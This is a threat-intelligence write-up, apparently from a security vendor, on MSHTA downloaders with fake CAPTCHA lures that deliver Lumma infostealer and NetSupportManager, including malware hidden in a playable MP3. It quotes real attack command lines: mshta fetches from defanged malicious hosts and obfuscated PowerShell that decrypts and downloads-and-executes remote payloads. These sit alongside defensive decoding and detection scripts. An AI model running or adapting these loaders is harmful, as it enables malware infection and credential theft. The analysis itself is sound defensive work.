The Sound of Malware



Anvilogic has recently observed a large uptick in first-stage downloaders that use MSHTA.exe, a legitimate Windows system binary (Microsoft HTML Application Host). Often, but not always, the downloaders carry a lure that entices the user to proceed or take action related to Cloudflare, reCAPTCHA or Ray. When executed, the downloaders often lead to a multi-stage infection chain with varying levels of obfuscation and uniqueness, including embedding the malware in a playable MP3 file.
Studying event and OS logs across our customers has given us useful context around these recent campaigns and allowed us to link several clusters of activity. New activity often comes in waves, with new angles and methodologies being tested by attackers.
Anvilogic observed an uptick and a new MSHTA trend beginning in August and continuing through September 2024. The structure of the commands was basic, with no detectable theme in naming convention. The URIs pointed to files with no extension, and the commands carried no trailing comment (unlike the lure-bearing command lines seen later):
Atomic-level threat identifier (For Anvilogic customers & the GitHub community)
- mshta.exe File Download (Anvilogic Armory | GitHub)
C:\WINDOWS\system32\mshta.exe hxxps://zone03.b-cdn[.]net/tr17
C:\Windows\system32\mshta.exe hxxps://mato-camp-v1.b-cdn[.]net/kesty
C:\Windows\system32\mshta.exe hxxps://getyourpages[.]com/downloads/t2
C:\Windows\system32\mshta.exe hxxps://tera17.b-cdn[.]net/tr17
Ultimately, a downloader's success depends on how reliably it runs across a variety of system configurations and contexts. What makes MSHTA particularly potent as a first-stage downloader is its ubiquity on Windows and the fact that it needs only one required parameter: a URI pointing at the code to execute. These downloader commands are portable, dead simple and effective. While we will later show that additional layers of complexity were added, these early infections often give useful information about what attackers may later attempt to do.
In the August and September instances, hxxps://getyourpages[.]com/downloads/t2 served up SHA256 073bf9e8fd710a361df3bfe3d7e8060606ea054ab86779e2da7b2190cc59a781. VirusTotal reports this as a member of the Palebeam malware family, and was able to determine that its configuration contained the URI hxxps://getyourpages[.]com/downloads/tera2.zip, as shown below:

The tera2.zip file had a SHA256 of 74fb85f85c08ed074ff5cb7261161c163220d23c23502b427d6372cd73ae1f06 and clocked in at an abnormally large 9.56MB. Another noteworthy piece of information here is the detections: there is a consensus that this sample is the Lumma infostealer:

It’s worth noting that Lumma almost always ships with additional files that serve to bloat the archive but are not themselves malicious. For the tera2.zip file mentioned above, the only malicious file appeared to be 0DollarERP.exe (SHA256 bbcf22aa482ee7f3cf7d9defdad1df591e354264609814a62d4b3fb42bb5ecbe), which is capable of infecting hosts on its own, separate from the sizable, old and benign files bundled with it:

0DollarERP.exe interestingly connects to a profile page on the gaming platform Steam (steamcommunity.com/profiles/76561199724331900) that contains encoded data. The profile acts as a dead-drop resolver: the sample fetches a page on a legitimate site and decodes its real infrastructure from it:

Using CyberChef’s “ROT13” operation with an “Amount” value of 15 (a shift of 15, not the default 13) reveals URLs:
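The same decoding, as an added example written for this post rather than code from Anvilogic or from the sample: a ROT-N routine equivalent to the CyberChef step, plus a brute force over all 26 shifts for cases where the amount is not known in advance. The encoded string is constructed (two hostnames under the reserved .invalid TLD, shifted so that an amount of 15 recovers them); the real profile contents are not reproduced, and the candidate TLD list used to rank shifts is an assumption.

```powershell
# Added example: ROT-N decode of dead-drop data, with a brute force over all shifts.
function ConvertFrom-Rot {
    param(
        [Parameter(Mandatory)][string]$Text,
        [Parameter(Mandatory)][int]$Amount
    )
    # Normalise so negative or >26 amounts behave like CyberChef's "Amount".
    $Amount = (($Amount % 26) + 26) % 26
    $out = foreach ($c in $Text.ToCharArray()) {
        if     ($c -cmatch '[a-z]') { [char]((([int]$c - [int][char]'a' + $Amount) % 26) + [int][char]'a') }
        elseif ($c -cmatch '[A-Z]') { [char]((([int]$c - [int][char]'A' + $Amount) % 26) + [int][char]'A') }
        else                        { $c }   # digits, dots, dashes pass through unchanged
    }
    -join $out
}

function Find-RotHostname {
    # Try every shift and keep those whose output looks like a hostname ending in
    # one of the candidate TLDs (the list is an assumption for this example).
    param(
        [Parameter(Mandatory)][string]$Text,
        [string[]]$Tld = @('com', 'net', 'org', 'shop', 'xyz', 'top', 'site', 'invalid')
    )
    $tldAlt  = ($Tld | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $pattern = "(?i)\b[a-z0-9-]+(\.[a-z0-9-]+)*\.($tldAlt)\b"
    foreach ($shift in 0..25) {
        $plain = ConvertFrom-Rot -Text $Text -Amount $shift
        $hits  = [regex]::Matches($plain, $pattern) | ForEach-Object { $_.Value }
        if ($hits) {
            [pscustomobject]@{ Shift = $shift; Hostnames = @($hits) }
        }
    }
}

# Constructed sample, not real Lumma data: two .invalid hostnames shifted by 11,
# so a ROT amount of 15 brings them back.
$encoded = 'oplo-ocza.tyglwto deplwpc-n2.tyglwto'
ConvertFrom-Rot -Text $encoded -Amount 15
Find-RotHostname -Text $encoded | Format-Table -AutoSize
```

The brute force only reports shifts whose output ends in a plausible TLD, which is what separates the one real shift from 25 lookalikes; extend the TLD list to the ones seen in your own telemetry before relying on it.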

Ray-Verify and the NetSupportManager RAT
In late October, we observed the first instance of a new pattern: MSHTA downloaders purporting to contain a “Ray Verification ID”:
Anvilogic Detections
- Command Line Homoglyphs - Windows (Anvilogic Armory | GitHub)
- mshta.exe File Download (Anvilogic Armory | GitHub)
- Suspicious CAPTCHA Command Line (Anvilogic Armory | GitHub)
mshta.exe hxxps://forthedoglover[.]com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 6456''"
mshta.exe hxxps://tekascend[.]com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 1437''"
mshta.exe hxxp://mwnetwork[.]biz/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: 3058''"
“Ray Verification ID” process command lines observed starting late October 2024
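Turning those two clusters into triage logic, as an added example (not one of the Anvilogic detections listed above, and not code from the original post): the function below checks process-creation records for the traits of this activity, mshta.exe given a remote URI, fake-CAPTCHA lure text after a trailing `#`, and non-ASCII characters (the ✅ and similar emoji or homoglyph tricks) in the command line. The records are constructed for the example and use reserved .example hostnames rather than the real infrastructure.

```powershell
# Added example: triage process-creation records for the mshta.exe downloader pattern.
# Constructed records; only the command-line shapes mirror what the post describes.
$sampleEvents = @(
    @{ Host = 'ws01'; Image = 'C:\WINDOWS\system32\mshta.exe'; CommandLine = 'C:\WINDOWS\system32\mshta.exe https://zone03.example/tr17' }
    @{ Host = 'ws02'; Image = 'C:\WINDOWS\system32\mshta.exe'; CommandLine = ('mshta.exe https://forthedoglover.example/Ray-verify.html # ' + [char]0x2705 + ' "Verify you are human - Ray Verification ID: 6456"') }
    @{ Host = 'ws03'; Image = 'C:\WINDOWS\system32\mshta.exe'; CommandLine = 'mshta.exe C:\Users\jdoe\AppData\Local\Temp\setup.hta' }
    @{ Host = 'ws04'; Image = 'C:\Windows\explorer.exe';        CommandLine = 'C:\Windows\explorer.exe' }
)

function Test-MshtaDownloader {
    param([Parameter(Mandatory)][hashtable]$Event)
    # Only mshta.exe launches are in scope for this check.
    if ($Event.Image -notmatch '(?i)(^|\\)mshta\.exe$') { return $null }
    $cmd = $Event.CommandLine
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Remote URI as the argument: the one parameter the loader needs.
    if ($cmd -match '(?i)\bhttps?://[^\s"'']+') {
        $findings.Add("remote URI argument: $($Matches[0])")
    }
    # 2. Fake-CAPTCHA lure: a trailing '#' comment carrying verification text,
    #    which exists only so the user sees it in the Run dialog.
    if ($cmd -match '(?i)#.*(verify|human|captcha|ray\s*verification)') {
        $findings.Add('CAPTCHA-style lure text after #')
    }
    # 3. Non-ASCII characters (emoji, homoglyphs) in a process command line.
    if ($cmd -match '[^\x00-\x7F]') {
        $findings.Add('non-ASCII characters in command line')
    }

    if ($findings.Count -eq 0) { return $null }
    [pscustomobject]@{
        Host        = $Event.Host
        Findings    = $findings -join '; '
        CommandLine = $cmd
    }
}

$sampleEvents | ForEach-Object { Test-MshtaDownloader -Event $_ } | Format-Table -AutoSize -Wrap
```

The third record, a local .hta, is deliberately not flagged: legitimate HTA use exists, and the signal in this cluster is the remote URI and the lure, not mshta.exe on its own.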
The “Ray”-themed downloaders shared a common chain of infection. First, they pointed to malformed HTA files named /Ray-verify.html which, once decoded, led to a batch of second-stage URIs:
hxxps://forthedoglover[.]com/Ray-verify.html -> hxxp://traversecityspringbreak[.]com/o/o.png
hxxps://tekascend[.]com/Ray-verify.html -> hxxp://goaccredited[.]biz/o/o.png
Ray first-stage Ray-verify.html files and their targets.
The formatting of these second-stage download locations differs from other clusters of activity around the same time, and the locations always deliver variants of the same payload: the NetSupportManager RAT.
The earliest example of NetSupportManager we identified was SHA256 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8. True to form, the earliest sample gave us some useful clues. It contacted `geo[.]netsupportsoftware[.]com`, a domain belonging to the legitimate NetSupport product, which is consistent with the payload being the commercial remote access tool abused as-is rather than a bespoke RAT:

Samples of NetSupportManager identified in the wild included:
hxxp://traversecityspringbreak[.]com/o/9.png -> 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
hxxp://goaccredited[.]biz/o/o.png -> 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
hxxp://tekascend[.]com/a/b.png -> b91fcd8501f5e5458675c9f07d5eadeee62b53eb2638fee5da9f48a8f44abd3b
NetSupportManager samples and their download locations
Changing Downloaders and Payloads
Beginning in late December 2024, a few new trends emerged simultaneously and continue today: a new second-stage downloader appeared, and new Lumma payloads arrived with a new PowerShell wrapper. Prior to this, the second stage of most download paths was handled by a PE-based downloader named Palebeam:
Palebeam PE downloader download locations and second-stage download locations
The Emmenhtal downloader is essentially a two-layer PowerShell script. The first layer contains a hex-encoded ciphertext together with the hex-encoded AES key; the IV is sixteen zero bytes (`[byte[]]::new(16)`). At runtime PowerShell decrypts the ciphertext, casts the bytes to characters, and invokes the first three characters of the result as a command with the remainder as its argument (`& $x.Substring(0,3) $x.Substring(3)`), so execution passes to the decrypted second layer. Here’s what the first layer looks like:
Anvilogic Detections
- Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
- PowerShell CreateDecryptor (Anvilogic Armory | GitHub)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -ep Unrestricted -nop function CijC($DimRSpi){-split($DimRSpi -replace '..', '0x$& ')};$Nqsh=CijC('[hex ciphertext elided]');$RjYEaMLuZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CijC('416B7652685A635669524E7976547165')),[byte[]]::new(16)).TransformFinalBlock($Nqsh,0,$Nqsh.Length)); & $RjYEaMLuZ.Substring(0,3) $RjYEaMLuZ.Substring(3)
Emmenhtal first layer script contents, from Sha256: 034694376c291c82789e7dc2c8771a4dff47c1c447f2ea7427edb968f480fa71
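An analyst-side version of that first layer, as an added example (not the loader’s code and not Anvilogic’s): it performs the same AES decryption with the same .NET calls but stops before the `&` invocation and reports the three-character command and its argument instead of running them. The key hex is the one from the sample above and the zero IV mirrors `[byte[]]::new(16)`; because the real ciphertext is elided above, the script first encrypts a constructed stand-in plaintext with that key, and the stand-in’s leading `iex` is an assumption about what the three characters usually are.

```powershell
# Added example: decrypt an Emmenhtal-style first layer without executing it.
function ConvertFrom-HexString {
    param([Parameter(Mandatory)][string]$Hex)
    $bytes = [byte[]]::new($Hex.Length / 2)
    for ($i = 0; $i -lt $bytes.Length; $i++) {
        $bytes[$i] = [Convert]::ToByte($Hex.Substring(2 * $i, 2), 16)
    }
    ,$bytes
}

function New-AesCbc {
    param([byte[]]$Key, [byte[]]$IV)
    # Aes::Create() defaults to CBC with PKCS7 padding, which is what the loader relies on.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = $IV
    $aes
}

function Protect-Layer1 {
    # Demo-only: produce a ciphertext in the loader's format from a constructed plaintext.
    param([string]$Plain, [byte[]]$Key, [byte[]]$IV)
    $aes  = New-AesCbc -Key $Key -IV $IV
    $data = [System.Text.Encoding]::ASCII.GetBytes($Plain)
    $ct   = $aes.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)
    $aes.Dispose()
    ($ct | ForEach-Object { $_.ToString('X2') }) -join ''
}

function Unprotect-Layer1 {
    param(
        [Parameter(Mandatory)][string]$KeyHex,
        [Parameter(Mandatory)][string]$CipherHex
    )
    $key = ConvertFrom-HexString $KeyHex
    $aes = New-AesCbc -Key $key -IV ([byte[]]::new(16))   # zero IV, as in the loader
    $ct  = ConvertFrom-HexString $CipherHex
    $pt  = $aes.CreateDecryptor().TransformFinalBlock($ct, 0, $ct.Length)
    $aes.Dispose()
    $text = -join [char[]]$pt                               # same byte-to-char cast as the loader
    # The loader does: & $text.Substring(0,3) $text.Substring(3). Report, never invoke.
    [pscustomobject]@{
        Command  = $text.Substring(0, 3)
        Argument = $text.Substring(3)
        KeyAscii = -join [char[]]$key                       # the hex key is a printable 16-char string
    }
}

$keyHex    = '416B7652685A635669524E7976547165'             # key from the sample above
$demoPlain = "iexWrite-Output 'second layer would run here'" # constructed stand-in, 'iex' assumed
$cipherHex = Protect-Layer1 -Plain $demoPlain -Key (ConvertFrom-HexString $keyHex) -IV ([byte[]]::new(16))
Unprotect-Layer1 -KeyHex $keyHex -CipherHex $cipherHex | Format-List
```

On a real sample, pull the key hex and ciphertext hex out of the two helper calls in the first layer and pass them to Unprotect-Layer1; the Argument field is the second layer, which can then be read rather than executed.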
The second layer more closely resembles a traditional unobfuscated PowerShell download, although there is typically light obfuscation here as well. In the sample below, `Get-Variable E*tex*` resolves `$ExecutionContext`, the wildcard member lookups resolve `New-Object` and the `DownloadString` method of a `Net.WebClient`, and `Get-Item Alias:\*EX` resolves the `iex` alias, so the whole line reduces to downloading the URI stored in `$p` (a .bmp extension masking the real content, as with the .png URIs above) and passing it to Invoke-Expression:
Anvilogic Detections
- Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
- PowerShell Hidden Window (Anvilogic Armory | GitHub)
"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -Command SI Variable:\p 'hxxps://kangla [.] klipxytozyi [.] shop/kangarooing.bmp';item *z;SI Variable:\Yj (&(Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).(((Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).PsObject.Methods|?{(GV _ -ValueOnl).Name-ilike '*lets'}).Name).Invoke('*w-*ct')Net.WebClient);.(Get-Item Alias:\*EX) (GCI Variable:/Yj).Value.((((GCI Variable:/Yj).Value|Member)|?{(GV _ -ValueOnl).Name-ilike '*nl*g'}).Name).Invoke((ChildItem Variable:/p).Value)
Emmenhtal second layer script contents, from Sha256: 034694376c291c82789e7dc2c8771a4dff47c1c447f2ea7427edb968f480fa71
In addition to Emmenhtal, the final Lumma payloads began to be encrypted using a PowerShell wrapper:
The Sound of Malware
The most interesting Emmenhtal theme we observed in our telemetry involved audio-themed HTA files:
When Emmenhtal used audio-based file types, the file contained enough legitimate content to partially load in our sandbox and play audio:

Shown above, our sandbox loaded the Emmenhtal HTA file 6fc41e727cc16e0889a2731622181eba0d3ed3fdcfb67bb05364eee637d4cd55 as an audio file. This behavior indicates that enough of a legitimate audio file’s structure remains for it to be parsed as one. The file was 6.65MB, a size reasonable for an MP3 but quite large for malware. It begins with the magic bytes 49 44 33 (ASCII “ID3”), which identify an MP3 file with an ID3v2 container, yet it also contains malicious content that MSHTA.exe will load: MSHTA hands whatever it fetches to the MSHTML engine, which is tolerant of leading non-markup bytes and ignores the extension, so the audio header does nothing to stop execution. Extension or magic-byte checks at the proxy are therefore not a reliable control on their own, which is why the detections below key on the process command line.
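A file-level check for that polyglot, as an added example (not from the original post): it reports whether a file carries the ID3v2 header and, independently, whether it contains HTA/HTML markup that mshta.exe would execute, flagging the combination. The sample file is constructed in the temp directory with an ID3 header, zero filler in place of audio frames, and inert markup; the marker list is an assumption and should be extended with what your own samples show.

```powershell
# Added example: detect an ID3/MP3 header combined with HTA markup in one file.
function Test-AudioHtaPolyglot {
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # "ID3" = 49 44 33: an ID3v2 container, which is how the sandbox classified the sample.
    $isId3 = $bytes.Length -ge 3 -and $bytes[0] -eq 0x49 -and $bytes[1] -eq 0x44 -and $bytes[2] -eq 0x33
    # Decode as Latin-1 so arbitrary binary bytes never break the text scan.
    $text = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)
    # Markers MSHTML would act on; assumption for this example, extend from real samples.
    $markers = '<script', '<hta:application', '<html', 'createobject(', 'wscript.shell'
    $found = $markers | Where-Object {
        $text.IndexOf($_, [System.StringComparison]::OrdinalIgnoreCase) -ge 0
    }
    [pscustomobject]@{
        Path       = $Path
        SizeMB     = [math]::Round($bytes.Length / 1MB, 2)
        Id3Header  = $isId3
        HtaMarkers = @($found)
        Polyglot   = ($isId3 -and @($found).Count -gt 0)
    }
}

# Constructed sample: ID3v2.3 header, filler standing in for audio frames, then markup.
$sample = Join-Path ([System.IO.Path]::GetTempPath()) 'polyglot-sample.mp3'
$enc    = [System.Text.Encoding]::GetEncoding(28591)
$header = $enc.GetBytes('ID3') + [byte[]](3, 0, 0, 0, 0, 0, 10)   # version 3.0, no flags, size
$filler = [byte[]]::new(4096)
$markup = $enc.GetBytes('<html><head><hta:application id="x"/></head><script language="vbscript">'' inert placeholder, no payload</script></html>')
[System.IO.File]::WriteAllBytes($sample, [byte[]]($header + $filler + $markup))

Test-AudioHtaPolyglot -Path $sample | Format-List
```

Run it over files that proxies or EDR classified as audio but that mshta.exe or a browser fetched; a true MP3 will report Id3Header only, while the Emmenhtal variant reports both.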
Anvilogic Detections
- Sequence threat techniques for Anvilogic customers: Fake CAPTCHAs Attack with File Download/Hidden & Persistence
- Atomic-level threat identifiers (For Anvilogic customers & the GitHub community)
- Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
- Command Line Homoglyphs - Windows (Anvilogic Armory | GitHub)
- Invoke-WebRequest Command (Anvilogic Armory | GitHub)
- mshta.exe File Download (Anvilogic Armory | GitHub)
- PowerShell CreateDecryptor (Anvilogic Armory | GitHub)
- PowerShell Hidden Window (Anvilogic Armory | GitHub)
- Suspicious CAPTCHA Command Line (Anvilogic Armory | GitHub)
